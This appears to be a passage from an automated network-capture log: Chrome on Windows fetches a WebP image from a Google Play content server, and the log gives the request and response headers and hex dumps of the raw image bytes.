                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: 68 d1 52 90 ff e4 8e 50 99 0a e4 7d 94 88 04 9e 80 09 bf 60 93 ca b1 ff f3 f4 3d 9b ea c0 e2 ed 89 ce e8 7a 8d be 3e d6 7a 33 4b 74 23 13 1b 3e 5c 38 bd 4f f1 8e c0 32 83 dd b7 a7 c7 6e 80 fb 16 ce bf 03 1b 31 67 99 23 74 c9 5f 10 7d e5 3d 6b 83 6e cf 89 03 f6 92 16 24 06 ed 7b 64 69 f6 82 8d 37 b4 53 d1 7c 61 e0 3f 64 18 ed 4f 98 4b 2a de 74 ba da c2 f4 94 48 41 2f 83 15 ea 7b f3 b0 30 53 7b 16 23 11 06 e3 b4 7d d8 a1 1c 5e 30 ab 87 90 52 f8 ba 76 f4 3e 1e 89 f5 66 a0 de 2d 30 fe 6b 39 9c 96 20 c9 d5 1d 8a 39 2a 4b a9 b1 ef e5 ef d6 f6 c7 f1 28 8f 35 ed 00 11 52 d1 7d 26 b1 5c 9e 93 52 a2 b1 6b b8 79 ef 7c 30 f0 32 18 c6 ba 7e 49 6a 48 68 70 3d 1b 37 7b 70 0f 3b 2f 28 e6 4e 37 64 58 ec c2 b5 d4 92 ad d5 29 00 26 2e 13 85 65 30 6c f0 1d 71 c9 aa be f8 5c
                                                                                                                                                                                                                                  Data Ascii: hRP}`=z>z3Kt#>\8O2n1g#t_}=kn${di7S|a?dOK*tHA/{0S{#}^0Rv>f-0k9 9*K(5R}&\Rky|02~IjHhp=7{p;/(N7dX)&.e0lq\
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: a5 75 f0 2d e7 7f 03 50 63 e3 3c 4c f4 e4 73 1c 91 58 d9 dc a3 f5 c6 99 bc d1 7b a1 8b 60 96 5d ad d1 84 88 18 57 f2 c3 4c e0 41 cf a2 e0 ff e2 ef 40 18 e2 fb b9 ac 4d 17 d7 3f fb 78 4e 7f b2 ac 82 47 a6 ff 4f 54 c4 91 27 ce 74 67 a3 35 cf 0c e9 7b 54 7d 7f 7c 25 95 4e 2c 42 11 b6 d7 69 95 cd 70 59 23 c1 53 dc 50 44 60 00 d8 39 b9 94 d0 9a fa ab 3b 1f 08 33 e1 e5 93 92 f4 24 80 ae cb a8 ee 8b 92 69 27 46 9a 2c 35 e2 f5 2e 3e ce b6 7c 47 e3 77 d6 78 ff 94 87 24 94 f5 ed 18 06 fe 41 e4 d4 af 8b 68 f2 8e 37 e6 ee b7 e1 06 ac 30 4c e2 39 48 91 48 b5 2c 84 07 62 84 ba 62 85 68 b2 6a 0f 2a ed 0e 1a 83 95 de 38 a3 ae e4 4f 67 df 68 aa d5 a1 64 59 fd 9b b0 e0 d0 b7 e9 8c e4 ee 2d 09 97 6e 60 f5 03 14 30 dd 06 03 e8 3d 36 c6 15 6d 37 0e 9d fb 0a 6e 95 7e ce cd 47
                                                                                                                                                                                                                                  Data Ascii: u-Pc<LsX{`]WLA@M?xNGOT'tg5{T}|%N,BipY#SPD`9;3$i'F,5.>|Gwx$Ah70L9HH,bbhj*8OghdY-n`0=6m7n~G
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: ab b1 ab b2 9e 63 d4 9b e7 d4 a4 b6 12 3f 5b ec 79 2c 9b c0 44 e6 a9 34 8f bc e6 8b 58 0e 33 ad ff 13 7a 2b a7 76 50 d7 f7 15 61 16 d8 f8 00 f7 a2 49 b9 11 4e d7 c6 8e 51 eb 93 f0 d2 23 af bf d3 c4 73 c0 f8 7b 56 d2 6a 3d 43 c1 dc d4 8f bc 5c af 85 f2 c5 3e 42 6a 9a fa 32 dc 24 31 69 b0 15 b9 5f 52 54 53 ac db d4 c4 bb 8a cb ec 0f 41 0d 51 96 40 53 b2 d8 be 1d d6 06 de c8 ee ab e6 9a db 54 7c b7 4d 52 65 cc 65 80 00 00 fe fd d9 3b 33 37 d6 29 b2 4f b4 d6 0c 70 71 60 75 a5 c0 02 84 df af ce c6 f1 ec 49 29 42 cc e9 7b 80 1e bc 7d f7 73 7c dd c3 55 1c b8 6a 9f bb 67 53 b4 9a fa 45 d1 9e ee 6c 59 69 d4 f3 ec f0 9f 91 b8 07 4b a6 e1 a0 46 89 b4 01 00 f6 a6 71 02 18 3e 7e 19 99 d9 6e c5 20 bf f7 e1 f3 f1 0b bb 51 29 2e e6 a7 86 d3 c5 cf 45 fa 2d 44 e8 10 d3 4e
                                                                                                                                                                                                                                  Data Ascii: c?[y,D4X3z+vPaINQ#s{Vj=C\>Bj2$1i_RTSAQ@ST|MRee;37)Opq`uI)B{}s|UjgSElYiKFq>~n Q).E-DN
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: 62 0f 95 a2 24 cf 6c 63 58 8f 47 32 19 44 71 10 e5 1d 7a d1 32 bc c5 75 86 65 65 1f a0 ef bd 63 bd 68 79 63 02 ae f5 f8 68 f1 98 c3 04 5d 2a 1d c9 5a 6a 5b a8 db f3 39 a7 d8 66 d9 b0 01 c8 ff e9 95 38 45 f5 9d 94 d5 c8 9f 6f 28 af 31 e1 a3 85 e2 83 7e 18 b8 43 b5 91 47 b5 33 ff 48 4e 60 98 ed 19 1d 13 fd 2b fd ae 8d 0e a5 1b 89 fb c9 c4 e0 78 7a 20 d3 ad 82 5b e7 2b 88 ac 37 13 e4 df 86 59 07 a5 f6 c1 46 42 c9 ff 8d 48 e0 4c b9 4c d7 36 29 9c fd 26 6f 8a c9 e6 f5 b1 69 8a 94 87 13 05 c7 1b 70 be 14 85 5b ed 34 08 6a 87 ee b2 41 7e d5 9f a9 40 5f d6 d8 7e 8d eb a9 39 17 29 f6 32 be fa 1b 68 31 c4 f0 16 87 dd e1 8d 05 4b ee 69 ac 5f 69 f6 62 72 4c ca b1 34 b3 8e 44 f5 7a 9a bf 48 d6 1c c5 dd ec 69 b4 cc ae 69 63 d9 6a c8 7e 9c 77 ae 86 f3 44 12 b1 2a 18 c7
                                                                                                                                                                                                                                  Data Ascii: b$lcXG2Dqz2ueechych]*Zj[9f8Eo(1~CG3HN`+xz [+7YFBHLL6)&oip[4jA~@_~9)2h1Ki_ibrL4DzHiicj~wD*
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: f5 59 d1 ba fe 05 d9 ce 19 b7 a6 65 d3 c3 62 6c e2 d7 8f 5b fb ce 72 b6 08 3a 95 ff f1 2d 50 d6 fe 68 fc 37 88 e0 c7 cf 50 41 a6 31 a7 c3 c5 fa 63 bd 7c 92 9e 3f 09 ee f8 8a 34 2a b9 e6 14 12 6c ff 75 a0 7f 73 29 d7 e3 04 f2 2b b1 25 71 ae b4 35 34 9c b3 de ed c3 2f 63 da e0 b5 ad 1b 68 fc af 52 c5 59 76 51 cc 2d 1d bd c9 33 de fb 78 1a 4d d1 97 aa 07 dc cb ff 94 a0 fd 02 33 b9 d0 be 88 c5 f7 a2 7b 03 fe 24 b9 f7 1f b5 d4 d5 d2 26 63 6f 4f 66 07 5c 59 cb 4d 31 a7 ec a2 c1 81 55 a5 63 c6 92 1e 17 1f 37 b2 e4 05 60 9e 41 b0 de 2e 65 ee 19 e1 d3 48 2d f6 95 0e 86 3e 1c e5 e0 c8 fe 67 06 54 3a b2 2a 62 83 a4 ee 6a e3 30 4e 64 7a 97 e6 a5 ed b6 42 c5 df 70 75 27 b0 49 76 c5 9f 35 48 32 0f a6 cb 32 d6 b8 8c a1 ef 54 6d 35 36 0e 39 49 97 39 3d c4 87 9b 51 f0 92
                                                                                                                                                                                                                                  Data Ascii: Yebl[r:-Ph7PA1c|?4*lus)+%q54/chRYvQ-3xM3{$&coOf\YM1Uc7`A.eH->gT:*bj0NdzBpu'Iv5H22Tm569I9=Q
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: 3a d0 23 87 af 11 c4 1e 58 fc bb 21 34 e7 20 66 99 d2 b8 c3 7c 00 b9 50 4e 8a 1c 99 bd 5b b6 2d ce ef 71 69 bd da e0 f0 73 b3 19 22 1d 6f 17 b3 cf 5c 26 5f f4 a8 28 9e f7 27 ce c7 96 34 f9 97 fc 0d 9d 1e 72 cc 4c 0b 28 17 f9 d0 48 42 eb ad 18 9b 9d f0 29 a7 59 67 ae 6b f6 63 57 9a ca bc ab 29 e0 43 cc 3e 48 78 5f 2b 5a b3 d1 86 35 7d 48 dd 30 a8 23 61 15 f6 93 eb df 63 87 97 a7 c3 fb 6b d9 ee a3 81 94 fc 77 ba 38 ac 85 bf 91 a9 45 51 b4 a8 12 c5 4a b5 05 59 b6 10 5d b5 f3 52 e1 13 93 f4 2f 8c 8a 7f f3 7d 39 43 a1 24 d1 05 8d 3d 58 5f 13 cc 27 04 b5 02 94 d8 3c 99 49 10 d7 6d 7b 17 dc 14 7f 9f fb 61 51 93 c2 c0 03 88 a3 ce 1f 3c 33 fa 57 3a 40 25 ca 65 65 44 91 a4 f5 6e 2c 9a e7 81 92 7d 53 fe f9 71 ea c7 63 44 fb 08 16 3b 58 24 a1 da 44 b4 a1 fa a4 8c ec
                                                                                                                                                                                                                                  Data Ascii: :#X!4 f|PN[-qis"o\&_('4rL(HB)YgkcW)C>Hx_+Z5}H0#ackw8EQJY]R/}9C$=X_'<Im{aQ<3W:@%eeDn,}SqcD;X$D
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: 22 a5 ac 2f 2e 08 e0 a5 b9 31 8b f5 6c a1 b5 8a a8 da 33 2e 5a ab 8f 4f 9b 47 27 e8 dc 3e c1 64 65 93 bd fe 60 41 c0 e5 8c 19 ee c8 2c 66 44 39 5e 95 03 4d 77 6c 98 df 4f ee bf ed 9a 46 d2 e3 99 90 92 73 c7 e8 0b 76 96 5f 54 fc 10 46 dd 4b a6 7d 32 f5 18 aa f7 92 e8 6b ba a7 63 eb 8d 37 69 68 db 3c 1c 45 76 c3 84 13 7e 9e 99 ef b9 6a 35 ae 57 55 c4 75 be a0 a8 5d 48 c4 e2 0b 65 d2 f5 d5 30 e8 4a b4 b6 cb 19 b5 a9 46 68 72 af 5f f0 71 33 ac 2a a0 f3 7c d9 0b 5a 32 2c 9c 9c 3d 1e 2e 77 88 8c 41 13 c2 82 2c 44 bd c1 3a 2b ea 92 80 95 01 c4 2f b4 0b ac da 4f 86 60 ef 07 d2 ac ec 87 c3 f6 77 c3 0d 0e 51 4d 00 26 3a b9 e0 89 5a ad 2c bb 70 70 9e 78 ea f3 6a 6b 4b 8e 8c ad 7d aa 0f 40 5e 7d 94 f4 2b 8d 6d ab 7e 8c fb 54 b2 75 c6 65 eb 79 51 e8 d9 6d 32 67 8c f8
                                                                                                                                                                                                                                  Data Ascii: "/.1l3.ZOG'>de`A,fD9^MwlOFsv_TFK}2kc7ih<Ev~j5WUu]He0JFhr_q3*|Z2,=.wA,D:+/O`wQM&:Z,ppxjkK}@^}+m~TueyQm2g
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: 40 b9 fa 11 af 67 f5 12 93 de 1b 85 60 a2 96 90 dc 05 89 b2 d8 47 53 eb b9 28 ac f2 fb ff d2 6a b4 e1 ae 3c a2 6d 49 94 82 16 fc f3 41 2a cc 61 91 aa 46 bf 51 9d f4 b9 15 88 80 11 fb 9e c4 f5 c4 b6 b4 46 4b d7 2a f5 5f 14 b6 4a 7e 3c a6 9f 5c 60 c6 0a e0 a0 a9 19 fe 29 4d c3 57 27 bd 14 a7 f5 24 df 41 7a c7 b1 80 c4 96 08 5e ad 82 24 a9 c3 49 17 6f b7 23 9c 8d 60 50 f1 c4 9a ef 6f 69 0b cc 56 d5 20 89 f4 bc 20 b8 40 22 72 d3 1e e6 07 8a 74 8a e5 1a 67 72 5e 6d 2b 15 34 5b 46 01 ec 42 6f 17 01 00 6f 40 98 57 d8 05 74 fd b3 02 32 1d 4d e0 50 fd 73 de a9 eb 45 00 51 a0 cd f4 e5 81 ac 42 7e e8 0a 4a df 16 4c c3 df f7 21 f7 1a a0 f1 da b5 87 2b 22 f5 fb 22 13 af b7 ca 48 3e 9b 7b 80 88 d5 86 ce 31 af 88 85 4d b4 6e 2d b2 30 2e 75 71 df 5c 44 83 bd 80 97 58 cf
                                                                                                                                                                                                                                  Data Ascii: @g`GS(j<mIA*aFQFK*_J~<\`)MW'$Az^$Io#`PoiV @"rtgr^m+4[FBoo@Wt2MPsEQB~JL!+""H>{1Mn-0.uq\DX


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  101192.168.2.649941216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:44 UTC1093OUTGET /xNx9CfCzg_VugRMv3rIxVd-GjLRx6_dIXGfTlrKqJwkZCPg_w-ZZNosQT46MYIoo_Q=w526-h296-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 12738
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:16:23 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 5842
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC856INData Raw: 52 49 46 46 ba 31 00 00 57 45 42 50 56 50 38 20 ae 31 00 00 b0 9b 00 9d 01 2a a6 00 28 01 3e 65 28 90 45 24 22 a1 97 5b c6 88 40 06 44 b5 00 68 65 19 7f 73 fc 8c ed d8 fa 1d f7 fb 6f ec ff e6 77 cc 85 89 fc 0f f7 9f d3 bc ab 55 57 96 df 3a 7f bf ff 1d f9 17 f3 2b fd 27 fb cf ef 1e eb 7f 41 ff cc f7 03 fd 4a ff 8f fd 97 fb f7 64 3f dc ef 50 7f d2 7f cf 7e db fb bb ff af fd 96 f7 85 fd f3 d4 0f fa 9f f9 cf 5b ff f8 1e c8 ff e0 bf da 7f ff f7 03 fe 81 fe ab d3 57 f6 e7 e0 fb fb 07 fb bf db df 81 6f d9 cf ff 5e c0 1f f8 bd 40 3f ee 71 40 7f 65 f4 5d e0 cf e2 bf 2b fc f3 f2 6d ea ff 70 7d 88 72 4f da 47 fa 5e 88 ff 33 fb d3 fb af f0 5f ba 1f 14 ff a0 ff 73 e1 7f ca 9f ee fd 42 3f 22 fe 7b fe 5b f3 3f ca c7 ba b2 dc 7a 05 fb 31 f5 3f f6 df de 7f 77 ff d9 7c 2e
                                                                                                                                                                                                                                  Data Ascii: RIFF1WEBPVP8 1*(>e(E$"[@DhesowUW:+'AJd?P~[Wo^@?q@e]+mp}rOG^3_sB?"{[?z1?w|.
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: 41 f7 43 3b 0d 9f 22 b1 63 49 bc 22 a7 bb 7e b9 a7 bb 0c 0f 8a 93 d8 8c 74 6c 5d f6 10 72 3c 5e 09 db ec c4 4e 4f 33 ba 2d 03 c5 2e 5e 79 d8 f3 9c 6f 21 a9 01 b2 51 80 14 d5 cb 74 c7 2c b2 45 10 fb 8d 8b ee b4 7e 54 56 d1 17 97 ec dd cd 79 0e 3a ce 37 55 0d c4 a5 82 69 bb 6b 3a cb 85 a2 71 86 f1 96 41 7d 94 df 9a 1c 8f 3b a7 d6 0a 0e 89 a4 5c dc 61 40 65 69 c7 0d 49 9e ff 3c 47 5f 40 18 6c cb a8 56 a3 69 66 96 08 ca 2b f4 6b ac d8 4c 9d d3 78 6b 97 8a 4e 64 c9 46 ed 2c ee 00 67 2d 0e a4 dd ed dd 50 7d 96 aa 51 b4 53 33 0f 3e a1 14 2e 4a 4a cf 6e 32 99 8a 47 80 81 cb 96 0b 20 9b a2 67 5c 18 42 78 ef b5 5f 42 7f 5f c6 02 1e 46 a0 c3 d7 fb 06 61 65 ab 8e b9 0d 70 ef a7 9f 3f 45 03 32 d7 f9 a4 8c ce 19 1e 2a 88 f2 b3 21 83 7c 3a 2b 90 dd 54 a1 2f ee 7d fe 76
                                                                                                                                                                                                                                  Data Ascii: AC;"cI"~tl]r<^NO3-.^yo!Qt,E~TVy:7Uik:qA};\a@eiI<G_@lVif+kLxkNdF,g-P}QS3>.JJn2G g\Bx_B_Faep?E2*!|:+T/}v
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: c0 5b c9 56 d0 51 48 a2 65 9b f2 90 7c de 4d ce 82 26 06 df f7 d2 f3 42 97 9f 8d 6f 20 a1 85 27 fe 1d d7 b9 6b 05 60 ce b4 71 f1 b1 b6 a3 65 18 9c 62 29 c1 38 89 52 17 81 44 dd 90 4f 96 3b 8e a9 cb 70 5a bc 3f d2 a2 ef 83 82 f7 28 b4 db 2a ae ab 85 b0 2a 87 bd 6f 7b f4 27 0d 2d 9b 7a 9a 06 9c 5d 1b 93 83 89 84 ff 07 56 3c f1 0c a2 84 9e 91 f3 7e 5d 84 e2 11 65 89 da 21 15 ef c9 d8 2d a6 0c 08 f6 9e 93 aa 35 b9 59 5a 92 0d 54 4a ba 11 55 dc e4 ed 64 9d 44 b8 7f 07 72 91 91 8f 87 06 4c 39 8b 38 8e 2e 0d 8a 01 fa 58 98 be cf 1b 5a 7e 9f f2 ac 9a 0f d3 a2 bc 23 84 87 96 65 ae 69 6f dd 29 a1 8c 80 33 e4 a4 96 5e b8 ab c7 ee d8 ee 45 d6 3d ea 9c a7 68 66 d9 c2 ed 2a b5 d8 e4 dd e4 9a 44 bf da c0 87 bb 5b 0a d6 21 77 63 b5 00 c8 26 68 da 90 db 25 77 31 2a 5e 8a
                                                                                                                                                                                                                                  Data Ascii: [VQHe|M&Bo 'k`qeb)8RDO;pZ?(**o{'-z]V<~]e!-5YZTJUdDrL98.XZ~#eio)3^E=hf*D[!wc&h%w1*^
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: cc b0 69 5c 44 1f f3 f8 e6 2f 9d 81 d1 ed 9f 2a c2 62 9b 29 d8 a7 6f 82 bf d7 0e 70 f7 61 b4 a0 66 ef 1f 48 49 ea cb 60 22 9a fb 10 e8 9d f3 6c e8 af b0 d8 c1 0b c9 fe 73 99 28 0e a5 19 88 52 89 f2 6a fc 60 d4 35 57 30 6e 2c eb 3d b2 f8 fe d9 1c 53 1e 56 7b ff 9a a8 8b 7a 98 c1 db 1e 96 25 1b bd 7d c0 db d0 c2 5a 92 07 d5 7a 06 ef bf 9f 26 ec a6 ee 2c f9 d5 c4 92 52 2b 21 c0 26 3e 02 97 14 dd 4f 98 d2 6f 1e 3e 23 72 47 97 c1 ed 43 3d b6 53 be f1 05 56 f6 2a 40 3c e1 08 ca 44 52 db ff 23 fe 58 24 32 d9 f7 d4 93 fe ed f8 d3 12 df 33 90 96 bf 2f c8 9e ba 12 57 1a be 37 c0 65 2c 63 fc 3b 96 8a be 83 68 31 c4 3f d1 9b 6c 42 ef 34 c6 59 48 42 12 ff 49 3c b1 a1 6e 48 0f 8e e3 64 8c a5 89 59 a4 19 09 f4 c3 d1 84 30 4c 04 59 e5 b5 56 0c 8b a3 d8 2b 81 73 8d a2 fc
                                                                                                                                                                                                                                  Data Ascii: i\D/*b)opafHI`"ls(Rj`5W0n,=SV{z%}Zz&,R+!&>Oo>#rGC=SV*@<DR#X$23/W7e,c;h1?lB4YHBI<nHdY0LYV+s
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: b1 23 1f c5 60 5e 1a 90 3a 3b 9f c3 cb 2f 5a d0 0c a1 11 01 ae cc e4 44 e1 36 63 e2 1f 95 fa 4f dd 8c 8b f7 84 9d 35 b1 a7 fb 79 ae f1 8c d8 f0 6e 9e ac dc d4 f4 38 f3 c7 b7 43 d8 a0 06 84 95 86 4f a6 ad b2 25 dd 4c b5 68 0c 3f 2f 9e ec c7 37 ca a6 63 8c 2a 17 e7 28 f8 67 98 55 cc e2 e2 3d 7d 76 26 68 4b 00 64 c5 8f f0 b6 3d c2 23 73 00 fc 6d e6 1d e4 de db 25 98 eb 3d f8 d7 c8 e5 91 2a 42 43 68 ff 67 3b e1 0b 80 6c 6e d3 c3 82 ed 47 16 37 df 3b 1f 90 76 25 d6 e3 b4 2f 51 d0 11 84 8b ab 21 0c aa 20 62 ea 2b 9c de fe 02 f3 34 ec 2b ba 23 2f 56 7d cf 99 31 ff c9 9d a2 4b 5b 06 fc 88 4e ac 15 05 b0 a9 af b9 80 42 7c 72 6b 78 e4 31 ae 0a 8d dd ba c4 88 d6 09 5d 7c 24 bf ae 07 cb 17 72 cf a9 1e f5 ba ab 98 79 f1 1d 55 ef f4 b8 b1 99 14 8b 5e 05 cf 68 4a 42 37
                                                                                                                                                                                                                                  Data Ascii: #`^:;/ZD6cO5yn8CO%Lh?/7c*(gU=}v&hKd=#sm%=*BChg;lnG7;v%/Q! b+4+#/V}1K[NB|rkx1]|$ryU^hJB7
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: 19 04 dd 5f 3e 5d e0 1f 0c 84 3d 56 b9 79 9a e1 72 c1 af fa d8 b3 b8 37 27 81 0d 80 e8 c9 08 64 70 83 b9 53 d9 e6 cf a7 14 ca b5 10 1d 17 45 03 94 8d 62 5b 57 5b 27 02 59 2b 70 d9 32 7c c6 9d 19 76 b2 ff d0 41 27 2b 22 92 10 40 99 52 ab ec b7 f1 c0 cf 73 04 7f 00 28 ae 13 43 62 4f 6d 0f 07 de 49 05 a9 b4 7a d1 5a 36 bc 6b 01 13 60 0d 4e 9e 89 dd 59 ea 03 8b 30 57 e5 08 a1 d7 fb da b9 d3 00 b9 36 8e e4 f7 b0 22 f5 66 3c 8c 5b 1a 9c f3 e6 37 b2 ff c9 a4 dd 51 31 6b d0 84 9b 8b 2f a3 52 95 aa cd 62 e0 cd 6d 63 d2 d7 2b c2 08 d9 8b 87 f2 15 50 26 9a b8 f3 cf 04 6f ac 6a 0e 4e 0c d9 4a b4 66 35 17 41 12 10 6d e4 b4 bd af 07 08 ff 1d 63 54 df 3d 51 3b 34 8f 57 ac 15 a7 fa 2b b3 d1 9b 4a d3 81 b6 d1 e3 0f 5d e8 d3 80 92 07 3d 2e 16 3a 2d bb ca 32 c2 e7 9b 8f e0
                                                                                                                                                                                                                                  Data Ascii: _>]=Vyr7'dpSEb[W['Y+p2|vA'+"@Rs(CbOmIzZ6k`NY0W6"f<[7Q1k/Rbmc+P&ojNJf5AmcT=Q;4W+J]=.:-2
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: e1 d6 d8 cf f5 03 fa 0a c3 ca 81 62 9f 98 51 dd e8 38 d0 e6 59 4f 4a 51 56 af 88 12 7f cf f7 9a 92 94 07 7c 26 89 bf 5b 60 6c 1f 31 5a 58 4f 79 40 f2 37 42 af f2 b4 2d b2 33 77 8a c7 41 fe 0b a4 86 b9 52 03 c0 ed fa f3 fc 88 a7 3c 06 dc 30 62 75 ab bb 8d cf fa 7d 81 4e e6 f4 1e 82 36 b6 62 1e 43 94 a3 69 d0 47 6b 09 a9 3c 86 22 00 9d 2d 25 22 58 dc a5 46 6c 3f 61 0a 86 17 d6 d5 73 cc d9 4a 32 7e fd 1e 21 7d eb 17 3e 87 59 b8 07 e8 a6 87 ed 8f f3 28 7e a3 9d be 76 3d 51 cf c6 7d 87 8e 77 df b7 1a 0f 98 83 0c cb 43 a8 32 f8 9d 6e c2 ff ef dd 18 c5 e1 ee f2 69 cd e9 77 09 b4 cd b2 94 77 50 a4 3d 99 04 4b 97 48 18 65 59 56 d1 6f 9e 7e 50 8c 9d 16 16 85 f2 f5 90 f7 f0 7a 6d 26 30 d5 ba 45 2c de 7b 2b 2b e4 29 b9 e3 92 0e 47 1d aa 67 89 77 ee d5 43 28 13 30 74
                                                                                                                                                                                                                                  Data Ascii: bQ8YOJQV|&[`l1ZXOy@7B-3wAR<0bu}N6bCiGk<"-%"XFl?asJ2~!}>Y(~v=Q}wC2niwwP=KHeYVo~Pzm&0E,{++)GgwC(0t
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: f4 90 bf dc 42 1f b4 1d a2 2f 28 b6 bc 34 8d f4 0b cb 8a 52 d0 d5 5e da d5 b4 e2 64 fa ce 49 08 a2 9d 9f 1e 3f 0e d3 f7 fd e1 a8 57 e3 a1 ed 32 2d be 00 9e 73 b9 cf 6a a0 87 d5 3f 8d df 9f 0f 12 89 4a 78 4f f4 df eb 1b 3d 78 42 36 1c 92 1d 79 f0 ff 57 c4 11 b4 0d 05 2b 09 be 96 52 7d 71 99 e7 00 1f 1a 98 47 91 66 ad 5d 0a c2 27 fe cd 48 91 cc 48 36 ec 49 d3 b8 b3 de 77 e7 6f 70 b1 f3 7d 60 76 2f 67 87 02 eb 81 5a 12 0b e8 2b 25 35 d7 90 d7 87 af 21 1f 90 e0 7f 2d 21 62 01 c5 ee e4 4d 41 10 25 32 54 07 64 61 ba 5e a9 62 91 a7 1e 6d fb a2 0c 40 d9 62 14 99 03 40 d1 32 b4 ef f8 77 78 bf 1e 4e 11 a8 9d ee 51 d9 4f a3 b1 34 6e c3 9a 27 05 12 8f a8 e7 0c 7c 46 10 41 d3 14 b8 0e 50 28 03 d2 d9 bb fb 29 c1 9c 34 8f 75 f2 46 b6 15 db 95 d2 92 b4 75 5f ca e1 6b af
                                                                                                                                                                                                                                  Data Ascii: B/(4R^dI?W2-sj?JxO=xB6yW+R}qGf]'HH6Iwop}`v/gZ+%5!-!bMA%2Tda^bm@b@2wxNQO4n'|FAP()4uFu_k
                                                                                                                                                                                                                                  2024-09-29 04:53:45 UTC1390INData Raw: 84 bf aa d3 5c 1c 19 64 f8 7c e5 a6 ee 22 6e d6 f3 c5 4d 04 14 dd eb a2 72 ff 5c db 48 b7 fb 6a f5 e3 42 eb 9c 4c c0 39 02 b6 4f b9 d4 ed 96 f2 7f 40 39 6d 55 58 66 b2 76 cd a2 13 cc da 38 c4 40 10 12 92 dd 90 76 d7 d5 63 76 f4 7c e3 fd ec 6c 22 83 5e 43 51 10 e1 7f 0b 78 11 10 3c 66 ee 13 4a 2c b8 14 5f 5c df e5 7d 53 0b c1 7f be 09 74 7a 08 ad 86 71 60 7e 31 ed 8a 06 ee 65 3c ef a2 fe 28 aa 88 53 79 63 1f 36 81 d4 8e 2f 38 fc 44 81 51 41 c3 c0 9e bc ae c8 4c 44 cf 1a cc 68 d2 8d d1 77 6b 64 22 c8 d3 d1 bd c2 1c 9c 1f f5 9b 31 24 04 07 50 38 fe cf 04 67 e2 f7 60 fa b1 93 a6 04 c0 ea b5 94 32 ca 44 5a 26 9e 2e 91 7d 34 20 f4 6c 05 9d 38 15 7f 30 20 60 15 56 92 e7 25 16 53 08 fe 1d 36 8b 1d 46 34 ed cf 32 4f c4 7d 6b d0 07 15 3c 3b 22 ee 34 c9 bd 03 a3 65
